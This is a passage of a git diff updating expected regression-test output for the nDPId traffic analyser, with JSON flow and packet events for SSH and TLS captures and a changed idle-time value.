b/test/results/ssh.pcap.out @@ -1,15 +1,15 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ssh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1320435464760} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1320435464760,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1320435464760,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAABAek9AAEAGi52sEO4BrBDuqOQbABY3Xn+qAAAAALAC\/\/+abgAAAgQFtAEDAwMBAQgKHJWv9QAAAAAEAgAA"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1320435464760,"pkt":"AFBWwAAIAAwppUXgCABFAAA8AABAAEAGBfGsEO6orBDuAQAW5BtConY2N15\/q6ASFqC42wAAAgQFtAQCCAoAEyL4HJWv9QEDAwY="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAAA0xzVAAEAGPsOsEO4BrBDuqOQbABY3Xn+rQqJ2N4AQ\/\/\/+RgAAAQEIChyVr\/UAEyL4"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} -01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} -01109{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1320435464760,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1320435464760,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAABAek9AAEAGi52sEO4BrBDuqOQbABY3Xn+qAAAAALAC\/\/+abgAAAgQFtAEDAwMBAQgKHJWv9QAAAAAEAgAA"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1320435464760,"pkt":"AFBWwAAIAAwppUXgCABFAAA8AABAAEAGBfGsEO6orBDuAQAW5BtConY2N15\/q6ASFqC42wAAAgQFtAQCCAoAEyL4HJWv9QEDAwY="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAAA0xzVAAEAGPsOsEO4BrBDuqOQbABY3Xn+rQqJ2N4AQ\/\/\/+RgAAAQEIChyVr\/UAEyL4"} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} +01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} +01109{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} +00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","packets-captured":258,"packets-processed":258,"total-skipped-flows":0,"total-l4-data-len":18498,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1320435713237} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 258/258 diff --git a/test/results/ssl-cert-name-mismatch.pcap.out b/test/results/ssl-cert-name-mismatch.pcap.out index 12705277f..9d7d3a11f 100644 --- a/test/results/ssl-cert-name-mismatch.pcap.out +++ b/test/results/ssl-cert-name-mismatch.pcap.out @@ -1,13 +1,13 @@ 00473{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620643422034} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620643422034,"flow_last_seen":1620643422034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620643422034,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620643422034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422034,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA8gCNAAEAGNQ\/AqALeaJpZadX0AbtP8LY3AAAAAKACchCFuAAAAgQFtAQCCAoBlw8kAAAAAAEDAwc="} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620643422162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422162,"pkt":"ACWQ1Mz5BBjWBrNaCABFAAA8AABAADAGxTJomllpwKgC3gG71fRoLFRgT\/C2OKASbgBjmAAAAgQFjAQCCAqtfZhXAZcPJAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620643422162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620643422162,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA0gCRAAEAGNRbAqALeaJpZadX0AbtP8LY4aCxUYYAQAOWFsAAAAQEICgGXD0StfZhX"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} -00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620643422034,"flow_last_seen":1620643422034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620643422034,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620643422034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422034,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA8gCNAAEAGNQ\/AqALeaJpZadX0AbtP8LY3AAAAAKACchCFuAAAAgQFtAQCCAoBlw8kAAAAAAEDAwc="} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620643422162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422162,"pkt":"ACWQ1Mz5BBjWBrNaCABFAAA8AABAADAGxTJomllpwKgC3gG71fRoLFRgT\/C2OKASbgBjmAAAAgQFjAQCCAqtfZhXAZcPJAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620643422162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620643422162,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA0gCRAAEAGNRbAqALeaJpZadX0AbtP8LY4aCxUYYAQAOWFsAAAAQEICgGXD0StfZhX"} 